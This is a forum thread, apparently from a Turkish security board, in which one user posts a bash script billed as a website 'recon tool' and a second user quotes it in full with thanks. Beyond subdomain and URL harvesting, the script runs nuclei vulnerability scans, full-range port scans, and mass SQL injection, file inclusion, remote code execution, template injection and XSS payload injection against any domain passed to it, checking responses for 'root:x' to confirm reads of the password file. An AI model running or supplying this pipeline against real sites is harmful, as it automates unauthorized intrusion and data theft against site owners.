recon tool (1 Viewer)

Joined
Aug 5, 2023
Credits
1,310
Rating - 0%
The scripts used in the tests carried out during the preliminary preparation stage for a website have been automated and combined so that they can be run in a single pass.

Bir web sitesi için ön hazırlık aşamasında yapılacak testlerde kullanılan scriptler otomatikleştirilmiş ve tek seferde kullanıma uygun hale getirilmiştir.


Bash:
#! /bin/bash
# Author of this script: rootayyildiz
#
# Recon pipeline: enumerates subdomains for the target domain given as $1,
# de-duplicates them, and probes which ones resolve over HTTP(S).
# Usage: ./recon.sh <domain>

# Abort early when the target domain is missing; everything below needs it.
if [ -z "$1" ]; then
    echo "Usage: $0 <domain>" >&2
    exit 1
fi

echo -e "\nSubdomain enumeration"
# Sublist3r — passive subdomain discovery, seeds domains.txt.
python3 /root/recon/Sublist3r/sublist3r.py -d "$1" -v -o domains.txt
# AssetFinder — append additional subdomains.
assetfinder --subs-only "$1" | tee -a domains.txt
# Amass (passive mode) — append yet more sources.
amass enum --passive -d "$1" | tee -a domains.txt
# Remove Duplicate Entries (in place).
sort -u domains.txt -o domains.txt
# Check for Resolving Subdomains; httpx prints live URLs.
httpx -follow-redirects -silent < domains.txt > alive.txt
# Keep only the URL part, stripping any "[...]" annotations httpx may add.
cut -d '[' -f1 < alive.txt > live.txt
rm "alive.txt"
printf "subdomain enumeration done"

# Work from the tool directory; abort if it is missing so the result files
# below are never written somewhere unexpected.
cd /root/recon/bash || exit 1

echo -e "\nFinding URLS using gau"
# Pull historical URLs for every discovered subdomain from public archives.
gau < domains.txt > gauurls.txt
printf "urls have been fetched from gau"

echo -e "\nFinding URLS using waybackurls"
waybackurls < domains.txt > waybackurls.txt
printf "urls have been fetched from waybackurls"

echo -e "\nMerging waybackurls+gau urls"
cat gauurls.txt >> waybackurls.txt
printf "Successfully merged"

echo -e "\nMerging waybackurls+gau urls and removing duplicates"
sort -u waybackurls.txt > validurls.txt
printf "Duplicate Remove done"

echo -e "\nJavascript enumeration"
# Collect unique archive URLs that look like JavaScript files.
# NOTE(review): this pattern also matches ".json", ".jsp", etc. — confirm
# that over-matching is intended.
sort -u waybackurls.txt | grep "\.js" > js-urls.txt
# Verify which of those JS URLs actually respond.
hakcheckurl < js-urls.txt > validjsfiles.txt
rm "gauurls.txt" "waybackurls.txt" "js-urls.txt"
printf "Javascript enumeration done"

echo -e "\nScraping parameters for fuzzing"
# Keep only URLs carrying query parameters, normalise them with uro,
# then probe for liveness before they feed the fuzzing stages.
grep "=" validurls.txt | uro | httpx > fuzzing.txt
printf "Scrapping done"

echo -e "\nGospider"
# Probe all enumerated domains (10s timeout, 15 threads); lol.txt records
# each probed URL together with its title and status code.
httpx -timeout 10 -threads 15 -l domains.txt -probe -title -status-code -no-color -o lol.txt -silent
# Strip the "[status] [title]" annotations so httpx.txt holds bare URLs.
cat lol.txt | cut -d [ -f1 >> httpx.txt
# Crawl the live hosts (depth 5) and keep only 200-responses whose URL
# (5th whitespace field of the crawler output) carries a query parameter.
gospider -S httpx.txt -c 10 -d 5 --blacklist ".(js|css|tif|tiff|ttf|woff|woff2|ico|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" >> fuzzing.txt
# Drop static-asset URLs from the merged list.
# NOTE(review): the dots here are unescaped regex metacharacters, so e.g.
# ".js" also matches "ajs" anywhere in the URL — confirm this is acceptable.
cat fuzzing.txt | grep -i -v -E ".js|.css|.gif|.woff|.woff2|.eot|.ttf|.txt|.ico|.tiff|.tif|.cgi|.jpg|.jpeg|.pdf|.svg|.png" >> maro.txt
# uro collapses URLs that differ only in parameter values.
cat maro.txt | uro > fuzzing.txt
sort -u fuzzing.txt -o fuzzing.txt
rm "maro.txt"


# Find vulnerable endpoints
echo "[+] Find Vulnerable Endpoints via gf [+]"
# Start a fresh report, then append one labelled section per gf pattern.
: > gf.txt
for entry in "ssrf:SSRF" "redirect:Redirect" "rce:RCE" "idor:IDOR" \
             "sqli:SQLI" "lfi:LFI" "ssti:SSTI" "debug_logic:Debug_Logic"; do
    pattern=${entry%%:*}
    label=${entry#*:}
    echo "[+] ${label}:" >> gf.txt
    gf "$pattern" < fuzzing.txt >> gf.txt
done
# For SSRF, also keep a dedicated de-duplicated candidate list.
gf ssrf < fuzzing.txt | sort -u >> ssrf.txt


echo -e "\nNuclei full scanning"
# Run CVE + vulnerability templates against every live host.
# NOTE(review): template paths are inconsistent across this script —
# ~/recon/... here, /root/nuclei-templates/... below, /root/recon/...
# elsewhere. They only coincide when running as root; confirm intent.
nuclei -l httpx.txt -t ~/recon/nuclei-templates/cves* -t ~/recon/nuclei-templates/vulnerabilities* > nuclei_subdomains_results.txt
printf "Full scanning completed"

echo -e "\nNuclei Vuln checking against URLS"
nuclei -l fuzzing.txt -t /root/nuclei-templates/vulnerabilities* >> vulnactiveurls.txt
printf "Nuclei Vuln checking against URLS Completed"

echo -e "\nJsendpoints using gospider"
# Shallow crawl (depth 1) of live hosts, including subdomains; static-asset
# extensions are excluded at crawl time.
gospider -S httpx.txt -c 10 -d 1 --other-source --include-subs --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | tee gospider.txt
cat gospider.txt | sort -u > endpoint.txt
# Filter crawler noise and asset URLs.
# NOTE(review): the bare "js" pattern also drops any URL merely containing
# the letters "js", and "[THREAD]" is a bracket expression matching single
# characters T/H/R/E/A/D rather than the literal tag — confirm intent.
cat endpoint.txt | grep -v -e "js" -e "Error:" -e "[THREAD]" -e "Usage:" -e "mm/dd/yy" -e "DD/MM/YYYY" -e "svg" -e "png" -e "jpg" | tee -a final-endpoint.txt
printf "gospiderdone"

echo -e "\nTech Detect"
# Fingerprint technologies on every live host.
nuclei -l httpx.txt -t /root/recon/nuclei-templates/technologies/ -o technologies.txt -silent
cp httpx.txt /root/recon/WhatWeb
# The original interleaved "cd .." hops were dead code — the following cd
# uses an absolute path anyway. Guard each cd so whatweb/mv/rm never run
# in the wrong directory if it fails.
cd /root/recon/WhatWeb/ || exit 1
./whatweb -i httpx.txt >> cms.txt
mv cms.txt /root/recon/bash
cd /root/recon/bash || exit 1
rm "endpoint.txt" "gospider.txt"
printf "Tech Detect Done"

echo -e "\nMASS SQLI TESTING"
{
# NOTE(review): $(cat ...) word-splits the payload file, so any payload
# containing whitespace arrives here broken into pieces — consider a
# 'while IFS= read -r' loop. The same applies to the three loops below.
for i in $(cat ~/.rootayyildiz/resources/payloads) ; do
# Substitute every query-parameter value with the current payload.
cat fuzzing.txt | qsreplace "$i" > sqli
# Request each candidate URL; -ft filters out fast responses, hits append.
ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
rm sqli
done
}

echo -e "\nMASS LFI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/lfipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > lfi
# -mr: keep only responses whose body matches the given regex.
ffuf -u FUZZ -w lfi -mr "root:x|Ubuntu" | tee -a lfivuln.txt
rm lfi
done
}

echo -e "\nMASS RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/rcepayloads) ; do
cat fuzzing.txt | qsreplace "$i" > rce
ffuf -u FUZZ -w rce -mr "root:x" | tee -a rcevuln.txt
rm rce
done
}

echo -e "\nMASS SSTI TO RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/sstipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > ssti
ffuf -u FUZZ -w ssti -mr "root:x" | tee -a sstivuln.txt
rm ssti
done
}

echo -e "\nNMAP SCANNING"
# Full-range TCP port scan of all discovered subdomains.
# -oN writes normal-format output; the original bare "-o" is not a valid
# nmap output option and is rejected by current nmap releases.
nmap -iL domains.txt -p 1-65535 -oN ports.txt
printf "nmap scanning done"


# Guard the cd so nothing below runs in the wrong directory if it fails.
cd /root/recon/bash || exit 1

echo -e "\nNMAP IP SCANNING"
# ip.sh resolves the subdomain list into bare IP addresses (hosts.txt).
./ip.sh domains.txt hosts.txt
nmap -iL hosts.txt -p 1-65535 -oN ip_ports.txt
printf "nmap IP scanning done"

echo -e "\nNUCLEI IP SCANNING"
nuclei -l hosts.txt -t /root/recon/nuclei-templates/ > IPnuclei.txt
printf "NUCLEI IP SCANNING"

echo -e "\nRustscan scanning"
# Full-range scan; "Open host:port" lines are captured, the prefix is
# stripped, live HTTP services are probed and fed straight into nuclei.
# NOTE(review): open_ports.txt only tees the intermediate list and is
# deleted immediately below — confirm it is not needed elsewhere.
rustscan -a 'hosts.txt' -r 1-65535 | grep Open | tee open_ports.txt | sed 's/Open //' | httpx -silent | nuclei -t ~/nuclei-templates/ > rustscanoutput.txt
rm "open_ports.txt"
printf "Rustscan completed"

echo -e "\nRust port scanning"
# Second full-range scan, this time persisting the raw open-port output.
rustscan -a 'hosts.txt' -r 1-65535 >> rust_openports.txt
printf "Rust port scanning completed"

echo "[+] Extracting Extension Files from WaybackUrls [+]"
# Keep only live archive URLs ending in noteworthy extensions (scripts,
# documents, backups, dumps). NOTE(review): egrep is deprecated in GNU
# grep — prefer 'grep -E'.
cat validurls.txt | httpx | egrep "asp$|aspx$|cer$|cfm$|cfml$|rb$|php$|php3$|php4$|php5$|jsp$|json$|apk$|ods$|xls$|xlsx$|xlsm$|bak$|cab$|cpl$|dmp$|drv$|tmp$|sys$|doc$|docx$|pdf$|txt$|wpd$|bat$|bin$" >> extensionsfromgauwayback.txt
printf "extension based files gathered"

echo -e "\nMASS XSS TESTING"
# Replace every parameter value with a unique marker plus HTML metacharacters.
cat fuzzing.txt | qsreplace "whoami663><'\"" > params.txt
# fff fetches each URL and stores request/response pairs under fff_out/.
cat params.txt | fff -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0" -o fff_out -S >> fff_index
# URLs whose response reflects the full marker (metacharacters unencoded).
grep -B1 -r "whoami663><'\"" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_full.txt
# URLs that reflect at least the bare marker word.
grep -B1 -r "whoami663" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_word.txt
# Only the weaker reflected_word list is passed to dalfox.
cat reflected_word.txt | dalfox pipe -o xss_results.txt
# NOTE(review): reflected_full.txt (the stronger signal) is deleted here
# while reflected_word.txt is kept — confirm this is intentional.
rm "reflected_full.txt" "params.txt" "fff_index"
rm -rf fff_out
printf "XSS testing done"

echo -e "\nXSS Reflection"
cat fuzzing.txt | kxss > kxss.txt
printf "XSS Reflection done"
 
Joined
Jan 3, 2024
Credits
0
Rating - 0%
The scripts used in the tests carried out during the preliminary preparation stage for a website have been automated and combined so that they can be run in a single pass.

Bir web sitesi için ön hazırlık aşamasında yapılacak testlerde kullanılan scriptler otomatikleştirilmiş ve tek seferde kullanıma uygun hale getirilmiştir.


Bash:
#! /bin/bash
# Author of this script: rootayyildiz
#
# Recon pipeline: enumerates subdomains for the target domain given as $1,
# de-duplicates them, and probes which ones resolve over HTTP(S).
# Usage: ./recon.sh <domain>

# Abort early when the target domain is missing; everything below needs it.
if [ -z "$1" ]; then
    echo "Usage: $0 <domain>" >&2
    exit 1
fi

echo -e "\nSubdomain enumeration"
# Sublist3r — passive subdomain discovery, seeds domains.txt.
python3 /root/recon/Sublist3r/sublist3r.py -d "$1" -v -o domains.txt
# AssetFinder — append additional subdomains.
assetfinder --subs-only "$1" | tee -a domains.txt
# Amass (passive mode) — append yet more sources.
amass enum --passive -d "$1" | tee -a domains.txt
# Remove Duplicate Entries (in place).
sort -u domains.txt -o domains.txt
# Check for Resolving Subdomains; httpx prints live URLs.
httpx -follow-redirects -silent < domains.txt > alive.txt
# Keep only the URL part, stripping any "[...]" annotations httpx may add.
cut -d '[' -f1 < alive.txt > live.txt
rm "alive.txt"
printf "subdomain enumeration done"

# Work from the tool directory; abort if it is missing so the result files
# below are never written somewhere unexpected.
cd /root/recon/bash || exit 1

echo -e "\nFinding URLS using gau"
# Pull historical URLs for every discovered subdomain from public archives.
gau < domains.txt > gauurls.txt
printf "urls have been fetched from gau"

echo -e "\nFinding URLS using waybackurls"
waybackurls < domains.txt > waybackurls.txt
printf "urls have been fetched from waybackurls"

echo -e "\nMerging waybackurls+gau urls"
cat gauurls.txt >> waybackurls.txt
printf "Successfully merged"

echo -e "\nMerging waybackurls+gau urls and removing duplicates"
sort -u waybackurls.txt > validurls.txt
printf "Duplicate Remove done"

echo -e "\nJavascript enumeration"
# Collect unique archive URLs that look like JavaScript files.
# NOTE(review): this pattern also matches ".json", ".jsp", etc. — confirm
# that over-matching is intended.
sort -u waybackurls.txt | grep "\.js" > js-urls.txt
# Verify which of those JS URLs actually respond.
hakcheckurl < js-urls.txt > validjsfiles.txt
rm "gauurls.txt" "waybackurls.txt" "js-urls.txt"
printf "Javascript enumeration done"

echo -e "\nScraping parameters for fuzzing"
# Keep only URLs carrying query parameters, normalise them with uro,
# then probe for liveness before they feed the fuzzing stages.
grep "=" validurls.txt | uro | httpx > fuzzing.txt
printf "Scrapping done"

echo -e "\nGospider"
# Probe all enumerated domains (10s timeout, 15 threads); lol.txt records
# each probed URL together with its title and status code.
httpx -timeout 10 -threads 15 -l domains.txt -probe -title -status-code -no-color -o lol.txt -silent
# Strip the "[status] [title]" annotations so httpx.txt holds bare URLs.
cat lol.txt | cut -d [ -f1 >> httpx.txt
# Crawl the live hosts (depth 5) and keep only 200-responses whose URL
# (5th whitespace field of the crawler output) carries a query parameter.
gospider -S httpx.txt -c 10 -d 5 --blacklist ".(js|css|tif|tiff|ttf|woff|woff2|ico|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" >> fuzzing.txt
# Drop static-asset URLs from the merged list.
# NOTE(review): the dots here are unescaped regex metacharacters, so e.g.
# ".js" also matches "ajs" anywhere in the URL — confirm this is acceptable.
cat fuzzing.txt | grep -i -v -E ".js|.css|.gif|.woff|.woff2|.eot|.ttf|.txt|.ico|.tiff|.tif|.cgi|.jpg|.jpeg|.pdf|.svg|.png" >> maro.txt
# uro collapses URLs that differ only in parameter values.
cat maro.txt | uro > fuzzing.txt
sort -u fuzzing.txt -o fuzzing.txt
rm "maro.txt"


# Find vulnerable endpoints
echo "[+] Find Vulnerable Endpoints via gf [+]"
# Start a fresh report, then append one labelled section per gf pattern.
: > gf.txt
for entry in "ssrf:SSRF" "redirect:Redirect" "rce:RCE" "idor:IDOR" \
             "sqli:SQLI" "lfi:LFI" "ssti:SSTI" "debug_logic:Debug_Logic"; do
    pattern=${entry%%:*}
    label=${entry#*:}
    echo "[+] ${label}:" >> gf.txt
    gf "$pattern" < fuzzing.txt >> gf.txt
done
# For SSRF, also keep a dedicated de-duplicated candidate list.
gf ssrf < fuzzing.txt | sort -u >> ssrf.txt


echo -e "\nNuclei full scanning"
# Run CVE + vulnerability templates against every live host.
# NOTE(review): template paths are inconsistent across this script —
# ~/recon/... here, /root/nuclei-templates/... below, /root/recon/...
# elsewhere. They only coincide when running as root; confirm intent.
nuclei -l httpx.txt -t ~/recon/nuclei-templates/cves* -t ~/recon/nuclei-templates/vulnerabilities* > nuclei_subdomains_results.txt
printf "Full scanning completed"

echo -e "\nNuclei Vuln checking against URLS"
nuclei -l fuzzing.txt -t /root/nuclei-templates/vulnerabilities* >> vulnactiveurls.txt
printf "Nuclei Vuln checking against URLS Completed"

echo -e "\nJsendpoints using gospider"
# Shallow crawl (depth 1) of live hosts, including subdomains; static-asset
# extensions are excluded at crawl time.
gospider -S httpx.txt -c 10 -d 1 --other-source --include-subs --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" | tee gospider.txt
cat gospider.txt | sort -u > endpoint.txt
# Filter crawler noise and asset URLs.
# NOTE(review): the bare "js" pattern also drops any URL merely containing
# the letters "js", and "[THREAD]" is a bracket expression matching single
# characters T/H/R/E/A/D rather than the literal tag — confirm intent.
cat endpoint.txt | grep -v -e "js" -e "Error:" -e "[THREAD]" -e "Usage:" -e "mm/dd/yy" -e "DD/MM/YYYY" -e "svg" -e "png" -e "jpg" | tee -a final-endpoint.txt
printf "gospiderdone"

echo -e "\nTech Detect"
# Fingerprint technologies on every live host.
nuclei -l httpx.txt -t /root/recon/nuclei-templates/technologies/ -o technologies.txt -silent
cp httpx.txt /root/recon/WhatWeb
# The original interleaved "cd .." hops were dead code — the following cd
# uses an absolute path anyway. Guard each cd so whatweb/mv/rm never run
# in the wrong directory if it fails.
cd /root/recon/WhatWeb/ || exit 1
./whatweb -i httpx.txt >> cms.txt
mv cms.txt /root/recon/bash
cd /root/recon/bash || exit 1
rm "endpoint.txt" "gospider.txt"
printf "Tech Detect Done"

echo -e "\nMASS SQLI TESTING"
{
# NOTE(review): $(cat ...) word-splits the payload file, so any payload
# containing whitespace arrives here broken into pieces — consider a
# 'while IFS= read -r' loop. The same applies to the three loops below.
for i in $(cat ~/.rootayyildiz/resources/payloads) ; do
# Substitute every query-parameter value with the current payload.
cat fuzzing.txt | qsreplace "$i" > sqli
# Request each candidate URL; -ft filters out fast responses, hits append.
ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
rm sqli
done
}

echo -e "\nMASS LFI TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/lfipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > lfi
# -mr: keep only responses whose body matches the given regex.
ffuf -u FUZZ -w lfi -mr "root:x|Ubuntu" | tee -a lfivuln.txt
rm lfi
done
}

echo -e "\nMASS RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/rcepayloads) ; do
cat fuzzing.txt | qsreplace "$i" > rce
ffuf -u FUZZ -w rce -mr "root:x" | tee -a rcevuln.txt
rm rce
done
}

echo -e "\nMASS SSTI TO RCE TESTING"
{
for i in $(cat ~/.rootayyildiz/resources/sstipayloads) ; do
cat fuzzing.txt | qsreplace "$i" > ssti
ffuf -u FUZZ -w ssti -mr "root:x" | tee -a sstivuln.txt
rm ssti
done
}

echo -e "\nNMAP SCANNING"
# Full-range TCP port scan of all discovered subdomains.
# -oN writes normal-format output; the original bare "-o" is not a valid
# nmap output option and is rejected by current nmap releases.
nmap -iL domains.txt -p 1-65535 -oN ports.txt
printf "nmap scanning done"


# Guard the cd so nothing below runs in the wrong directory if it fails.
cd /root/recon/bash || exit 1

echo -e "\nNMAP IP SCANNING"
# ip.sh resolves the subdomain list into bare IP addresses (hosts.txt).
./ip.sh domains.txt hosts.txt
nmap -iL hosts.txt -p 1-65535 -oN ip_ports.txt
printf "nmap IP scanning done"

echo -e "\nNUCLEI IP SCANNING"
nuclei -l hosts.txt -t /root/recon/nuclei-templates/ > IPnuclei.txt
printf "NUCLEI IP SCANNING"

echo -e "\nRustscan scanning"
# Full-range scan; "Open host:port" lines are captured, the prefix is
# stripped, live HTTP services are probed and fed straight into nuclei.
# NOTE(review): open_ports.txt only tees the intermediate list and is
# deleted immediately below — confirm it is not needed elsewhere.
rustscan -a 'hosts.txt' -r 1-65535 | grep Open | tee open_ports.txt | sed 's/Open //' | httpx -silent | nuclei -t ~/nuclei-templates/ > rustscanoutput.txt
rm "open_ports.txt"
printf "Rustscan completed"

echo -e "\nRust port scanning"
# Second full-range scan, this time persisting the raw open-port output.
rustscan -a 'hosts.txt' -r 1-65535 >> rust_openports.txt
printf "Rust port scanning completed"

echo "[+] Extracting Extension Files from WaybackUrls [+]"
# Keep only live archive URLs ending in noteworthy extensions (scripts,
# documents, backups, dumps). NOTE(review): egrep is deprecated in GNU
# grep — prefer 'grep -E'.
cat validurls.txt | httpx | egrep "asp$|aspx$|cer$|cfm$|cfml$|rb$|php$|php3$|php4$|php5$|jsp$|json$|apk$|ods$|xls$|xlsx$|xlsm$|bak$|cab$|cpl$|dmp$|drv$|tmp$|sys$|doc$|docx$|pdf$|txt$|wpd$|bat$|bin$" >> extensionsfromgauwayback.txt
printf "extension based files gathered"

echo -e "\nMASS XSS TESTING"
# Replace every parameter value with a unique marker plus HTML metacharacters.
cat fuzzing.txt | qsreplace "whoami663><'\"" > params.txt
# fff fetches each URL and stores request/response pairs under fff_out/.
cat params.txt | fff -H "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:82.0) Gecko/20100101 Firefox/82.0" -o fff_out -S >> fff_index
# URLs whose response reflects the full marker (metacharacters unencoded).
grep -B1 -r "whoami663><'\"" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_full.txt
# URLs that reflect at least the bare marker word.
grep -B1 -r "whoami663" fff_out/ | grep GET | cut -d' ' -f2 >> reflected_word.txt
# Only the weaker reflected_word list is passed to dalfox.
cat reflected_word.txt | dalfox pipe -o xss_results.txt
# NOTE(review): reflected_full.txt (the stronger signal) is deleted here
# while reflected_word.txt is kept — confirm this is intentional.
rm "reflected_full.txt" "params.txt" "fff_index"
rm -rf fff_out
printf "XSS testing done"

echo -e "\nXSS Reflection"
cat fuzzing.txt | kxss > kxss.txt
printf "XSS Reflection done"
Eline sağlık
 

Users who are viewing this thread

Top